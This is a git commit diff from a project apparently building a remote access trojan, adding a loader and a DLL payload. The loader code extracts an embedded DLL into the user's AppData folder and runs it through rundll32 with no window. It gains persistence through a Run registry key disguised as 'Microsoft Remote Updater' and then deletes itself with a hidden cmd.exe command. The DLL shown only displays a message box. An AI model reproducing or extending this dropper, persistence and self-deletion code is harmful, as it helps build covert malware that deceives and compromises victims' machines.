DLL now has persistance, Loader deletes itself after extracting dll and creating persistance

This commit is contained in:
hellisabove
2023-07-03 20:15:14 +03:00
parent 9f4a57720b
commit e99cfca22a
22 changed files with 64 additions and 7 deletions
BIN
View File
Binary file not shown.
BIN
View File
Binary file not shown.
BIN
View File
Binary file not shown.
Binary file not shown.
BIN
View File
Binary file not shown.
+1
View File
@@ -1,5 +1,6 @@
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information. C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Microsoft.CppBuild.targets(391,5): warning MSB8028: The intermediate directory (Debug\) contains files shared from another project (Dll.vcxproj). This can lead to incorrect clean and rebuild behavior. C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Microsoft.CppBuild.targets(391,5): warning MSB8028: The intermediate directory (Debug\) contains files shared from another project (Dll.vcxproj). This can lead to incorrect clean and rebuild behavior.
fundll.cpp
Creating library C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.exp Creating library C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.exp
Generating code Generating code
All 3 functions were compiled because no usable IPDB/IOBJ from previous compilation was found. All 3 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
Binary file not shown.
Binary file not shown.
Binary file not shown.
+1 -1
View File
@@ -31,7 +31,7 @@
<ConfigurationType>DynamicLibrary</ConfigurationType> <ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries> <UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v141_xp</PlatformToolset> <PlatformToolset>v141_xp</PlatformToolset>
<CharacterSet>Unicode</CharacterSet> <CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization> <WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup> </PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+7 -3
View File
@@ -6,14 +6,18 @@ BOOL APIENTRY DllMain(HMODULE Base, DWORD Callback, LPVOID Param) {
break; break;
case DLL_PROCESS_DETACH: case DLL_PROCESS_DETACH:
break; break;
default: default:
break; break;
} }
return 1;
} }
extern "C" __declspec(dllexport) int FunEntry() { extern "C" __declspec(dllexport) int FunEntry() {
return MessageBoxA(0, "Hello from C2", 0, 0); char exe[MAX_PATH + 1];
GetModuleFileNameA(0, exe, sizeof(exe));
MessageBoxA(0, exe, "I am inside: ", 0);
return 0;
} }
Binary file not shown.
+1 -1
View File
@@ -1,2 +1,2 @@
LINK : C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe not found or not built by the last incremental link; performing full link injector.cpp
Injector.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe Injector.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe
Binary file not shown.
Binary file not shown.
Binary file not shown.
+4
View File
@@ -1,2 +1,6 @@
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information. C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
cl : Command line warning D9025: overriding '/sdl-' with '/GS-'
loader.cpp
tools.cpp
Generating Code...
Loader.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Loader.exe Loader.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Loader.exe
Binary file not shown.
Binary file not shown.
Binary file not shown.
+1 -1
View File
@@ -96,7 +96,7 @@
<Link> <Link>
<SubSystem>Windows</SubSystem> <SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation> <GenerateDebugInformation>true</GenerateDebugInformation>
<AdditionalDependencies>kernel32.lib;user32.lib</AdditionalDependencies> <AdditionalDependencies>kernel32.lib;user32.lib;advapi32.lib</AdditionalDependencies>
</Link> </Link>
</ItemDefinitionGroup> </ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+49 -1
View File
@@ -4,7 +4,7 @@
INT WINAPI WinMain(HMODULE current, HMODULE previous, LPSTR cmd, INT show) { INT WINAPI WinMain(HMODULE current, HMODULE previous, LPSTR cmd, INT show) {
PBYTE module_base = PBYTE(Tools::GetImageBase()); PBYTE module_base = PBYTE(Tools::GetImageBase());
if (module_base != ERROR) { if (module_base != ERROR) {
// extract payload from section move to %appdata% with random name // extract payload from section
DWORD module_size = NULL; DWORD module_size = NULL;
PBYTE dll_memory = Tools::ExtractDllFile(module_base, &module_size); PBYTE dll_memory = Tools::ExtractDllFile(module_base, &module_size);
@@ -18,6 +18,54 @@ INT WINAPI WinMain(HMODULE current, HMODULE previous, LPSTR cmd, INT show) {
if (new_file != INVALID_HANDLE_VALUE) { if (new_file != INVALID_HANDLE_VALUE) {
WriteFile(new_file, dll_memory, module_size, &bytes_written, NULL); WriteFile(new_file, dll_memory, module_size, &bytes_written, NULL);
} }
CloseHandle(new_file);
}
LocalFree(dll_memory);
// runs the dll after extraction
WCHAR win_path[MAX_PATH];
if (ExpandEnvironmentStringsW(TEXT("%WINDIR%"), win_path, MAX_PATH - 1) > 0) {
if (wsprintfW(win_path, TEXT("%s\\System32\\rundll32.exe "), win_path) != NULL) {
lstrcatW(win_path, appdata_path);
lstrcatW(win_path, L",");
lstrcatW(win_path, L"FunEntry");
STARTUPINFO startup_inf{ 0 };
PROCESS_INFORMATION process_information{ 0 };
startup_inf.cb = sizeof(startup_inf);
BOOL b = CreateProcessW(NULL, win_path, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | CREATE_NO_WINDOW, NULL, NULL, &startup_inf, &process_information);
if (b) {
HKEY reg_key;
LONG bb = RegOpenKeyExA(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE, &reg_key);
if (bb == ERROR_SUCCESS) {
RegSetValueEx(reg_key, L"Microsoft Remote Updater", 0, REG_SZ, (LPBYTE)win_path, sizeof(win_path));
RegCloseKey(reg_key);
}
//WaitForSingleObject(process_information.hProcess, INFINITE);
//CloseHandle(process_information.hProcess);
}
}
}
}
// delete loader
WCHAR del_cmd[MAX_PATH];
if (ExpandEnvironmentStringsW(TEXT("%WINDIR%"), del_cmd, MAX_PATH - 1) > 0) {
if (wsprintfW(del_cmd, TEXT("%s\\System32\\cmd.exe "), del_cmd) != NULL) {
WCHAR app_name[MAX_PATH];
GetModuleFileNameW(0, app_name, MAX_PATH);
lstrcatW(del_cmd, L"/c del \"");
lstrcatW(del_cmd, app_name);
lstrcatW(del_cmd, L"\"");
STARTUPINFO sii{ 0 };
PROCESS_INFORMATION pii{ 0 };
sii.cb = sizeof(sii);
CreateProcessW(NULL, del_cmd, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | CREATE_NO_WINDOW, NULL, NULL, &sii, &pii);
return 0;
} }
} }
} }